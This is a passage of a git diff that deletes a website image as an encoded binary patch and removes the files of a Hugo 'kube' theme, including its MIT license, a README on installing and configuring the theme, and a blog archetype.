zA}ZK6AQDpAdBMapm}8CVRiTTc)A3&11vE~=Z9GM*j~rc4B1NV<C&iccL=3;Pk0q?c
z#9!0w>?9RL`neC+^5%s>=ITAxxvXFke`bV0m>I`jSfTTMz{tVKFO>Dqxvxc$b08=5
zBgy!f);9}~m1p1t4Y%kfF_eGlg(fN0>`yc|+=!}U;*U~Z&wwGI#IR54J{9(BmoT^M
z&6&w&Ui+RsoA*naPi0D=+l)h0%-heOtchiw(?vvej#k({y;)pN76-uh5W-&c#-$;1
zwr^R>{Gs#p%59pQ-6T|epNSn8&rwOg5YQZ|9kc%hJ~n8x9k!5Y<rZe45&rz*^IX+Q
zAIsi-ig|1S*RaHDL)dhscQaq67am<A277uD`cR<5P)$zacBJeNM)?afEX<VYaePW8
zISEXgC@>x|L@FCa8vhMx$O-(3A}pk^z@qf=kwW&}y;!b)weYk)gJ-G)CHdPwrK&bn
zbTeP?bdmVn8&7rgDGfIe@un~uQhBnpArfY61c8xA0ccK9umPx*1S953tr5iR7;CTM
z{jdn@iQJokGjlBEa*OQA2r~pz>F+5f-7-1uFg874wu<xJO-Px(B*EUR-_vRf3}_A_
zsh7A4Bssg-ZLjrJb<ntN;j@-GXqlQ-u<H|0yd|o71)~Gh(iT@z5tD>j8DU;Uo7UbC
Uj`fy90MMVDw6avCgh}B40qiPG=Kufz

diff --git a/website/src/static/img/no-need-to-distribute-keys.png b/website/src/static/img/no-need-to-distribute-keys.png
deleted file mode 100644
index a6ec1ceced3a8c34961615c83f596397fa08f92b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8889
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
RNim2CSen|N!JGL0`5)yC0^tAv

diff --git a/website/src/themes/kube/.gitignore b/website/src/themes/kube/.gitignore
deleted file mode 100644
index e43b0f9889..0000000000
--- a/website/src/themes/kube/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-.DS_Store
diff --git a/website/src/themes/kube/LICENSE.md b/website/src/themes/kube/LICENSE.md
deleted file mode 100644
index ff11aa1ee4..0000000000
--- a/website/src/themes/kube/LICENSE.md
+++ /dev/null
@@ -1,20 +0,0 @@
-The MIT License (MIT)
-
-Copyright (c) 2017 mohamed jebli
-
-Permission is hereby granted, free of charge, to any person obtaining a copy of
-this software and associated documentation files (the "Software"), to deal in
-the Software without restriction, including without limitation the rights to
-use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
-the Software, and to permit persons to whom the Software is furnished to do so,
-subject to the following conditions:
-
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
-FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
-COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
-IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
-CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/website/src/themes/kube/README.md b/website/src/themes/kube/README.md
deleted file mode 100644
index 43bcbe5304..0000000000
--- a/website/src/themes/kube/README.md
+++ /dev/null
@@ -1,177 +0,0 @@
-# kube Theme for Hugo
-
-`kube` Kube is a professional  and a responsive Hugo theme for developers and designers that offers a documentation section mixed with a landing page and a blog.
-
-I create this theme  based on the `Version 6.5.2` [Kube Framework](https://imperavi.com/kube/). 
-
-![kube hugo landingPage](https://cldup.com/RjWtdJZNae.png)
-
-# Demo
-
-To see this theme in action, check out [kube project](http://kube.elemnts.org) which is rendered with this theme and some conetnt for documentation and blog posts.
-
-## Features
-
-- Mobile-first Design : Every element in kube is mobile-first and fully embraces latest and greatest tech.
-- Responsive Design : Optimized for mobile, tablet, desktop
-- Horizontal Rhythm : Like Kube framework this theme is based on a 4px vertical grid.
-- Typography : beautiful typographie choice
-- Google Analytics : Google Analytics using the internal async template
-- Disqus Commenting : Post comments with Disqus using the internal template
-- OpenGraph support : SEO-optimized using OpenGraph
-- Schema Structured Data : Schema Structured Data and Meta tags
-- Paginated Lists : Simple list pagination with page indicators
-- Reading Time : Post reading time and update notice set user expectations
-- Meta data for all blog article : Rich post data including links to category and tag taxonomy listings, author and word count
-- Related Posts : Related Content for increased page views and reader loyalty
-- Block Templates : Block Templates for foolproof layout extensions
-- Table of Contents : Accessible Table of Contents for documentation
-- SEO Site Verification : Site verification with Google, Bing Alexa and Yandex
-- 404 page : 404 page with animated background
-
-## Installation
-
-Inside the folder of your Hugo site run:
-
-    $ mkdir themes
-    $ cd themes
-    $ git clone https://github.com/jeblister/kube.git
-
-For more information read the official [setup guide](//gohugo.io/overview/installing/) for Hugo.
-
-
-Copy custom archetypes to your site:
-
-```shell
-cp themes/kube/archetypes/* archetypes
-```
-
-
-Next, take a look in the `exampleSite` folder at. This directory contains an example config file and the content for the demo. It serves as an example setup for your blog. 
-
-Copy at least the `config.toml` in the root directory of your website. Overwrite the existing config file if necessary. 
-
-Hugo includes a development server, so you can view your changes as you go :
-
-``` sh
-hugo server -w
-```
-
-Now you can go to [localhost:1313](http://localhost:1313) and the `kube`
-theme should be visible.
-
-
-## Getting Started
-
-There are a few concepts this theme employs to make a personal documentation site. It's important to read this as you may not see what you expect upon launching. It assumes you want to call your documentation posts `docs` and organizes them as such. For example, creating a new docs with Hugo would require you typing:
-
-```
-  $ hugo new --kind docs docs/my-new-doc.md
-
-```
-
-It also assumes you want to display three types of content `docs` and `blog` and some pages : the `faq`, `company` and `sign-in` pages and and display links to this pages in the menu. This guide will take you through the steps to configure your documentation site to use the theme.
-
-### Configuring you website
-
-#### Where should blog post markdown files be stored?
-
-The theme works with other content types, but docs pages work best when grouped under `docs`. When using the `docs` content type you'll have a customized list page sorted by `weight` and the default list page for all documentation. Here's an example:
-
-![Custom List docs Page](https://cldup.com/8k1nU8TLuU.png)
-
-
-
-#### Defining yourself as the Author
-
-In this case you would want to add `author = "your name"` variable like your name to your post's Front Matter.
-
-
-#### Webmaster Verification
-
-Verify your site with several webmaster tools including Google, Bing, Alexa and Yandex. To allow verification of your site with any or all of these providers simply add the following to your `config.toml` and fill in their respective values:
-
-```toml
-[params.seo.webmaster_verifications]
-  google = "" # Optional, Google verification code
-  bing = "" # Optional, Bing verification code
-  alexa = "" # Optional, Alexa verification code
-  yandex = "" # Optional, Yandex verification code
-```
-
-### Index Blocking
-
-Just because a page appears in your `sitemap.xml` does not mean you want it to appear in a SERP. Examples of pages which will appear in your `sitemap.xml` that you typically do not want indexed by crawlers include error pages, search pages, legal pages, and pages that simply list summaries of other pages.
-
-Though it's possible to block search indexing from a `robots.txt` file, kube makes it possible to block page indexing using Hugo configuration as well. By default the following page types will be blocked:
-
-- Section Pages (e.g. Post listings)
-- Taxonomy Pages (e.g. Category and Tag listings)
-- Taxonomy Terms Pages (e.g. Pages listing taxonomies)
-
-To customize default blocking configure the `noindex_kinds` setting in the `[params]` section of your `config.toml`. For example, if you want to enable crawling for sections appearing in [Section Menu](#adding-a-section-menu) add the following to your configuration file:
-
-```
-[params]
-  noindex_kinds = [
-    "taxonomy",
-    "taxonomyTerm"
-  ]
-```
-
-To block individual pages from being indexed add `nofollow` to your page's front matter and set the value to `true`, like:
-
-```toml
-noindex = true
-```
-
-And, finally, if you're using Hugo `v0.18` or better, you can also add an `_index.md` file with the `noindex` front matter to control indexing for specific section list layouts:
-
-```shell
-├── content
-│   ├── modules
-│   │   ├── starry-night.md
-│   │   └── flying-toilets.md
-│   └── news
-│       ├── _index.md
-│       └── return-flying-toasters.md
-```
-
-To learn more about how crawlers use this feature read [block search indexing with meta tags](https://support.google.com/webmasters/answer/93710).
-
-### Custom CSS
-
-To add your own theme css or override existing CSS without having to change theme files do the following:
-
-1. Create a `style.css` in your site's `layouts/static/css directory` or use `custom.css` file in 'themes/kube/static/css/custom.css`
-1. Add link to this file in 'themes/kube/layouts/_default/baseof.html'.
-
-Default `style block` :
-
-```html
-<!-- Your own theme here -->
- <link href="/css/custom.css" rel="stylesheet" type="text/css">
-
-```
-
-
-## Contributing
-
-Did you find a bug or have an ideas for new features? Feel free to use the issue tracker to let me know or make a pull request.
-
-There's only one rule...there are no rules.
-
-## License
-
-MIT
-
-## Credit 
-
-- [kube framework] (https://imperavi.com/kube/)
-- [after dark theme] (https://github.com/comfusion/after-dark)
-
-## Contact
-
-This is the second theme I've made for Hugo, so I'm sure I've done some things wrong or assumed too much. If you have ideas or things that should be fixed, please let me know.
-
-- [Mohamed JEBLI](http://findme.surge.sh) [@jebli_7](http://twitter.com/jebli_7)
diff --git a/website/src/themes/kube/archetypes/blog.md b/website/src/themes/kube/archetypes/blog.md
deleted file mode 100644
index 5c22f4a3f2..0000000000
--- a/website/src/themes/kube/archetypes/blog.md
+++ /dev/null
@@ -1,6 +0,0 @@
-+++
-title = ""
-description = ""
-weight = 20
-draft = false
-+++
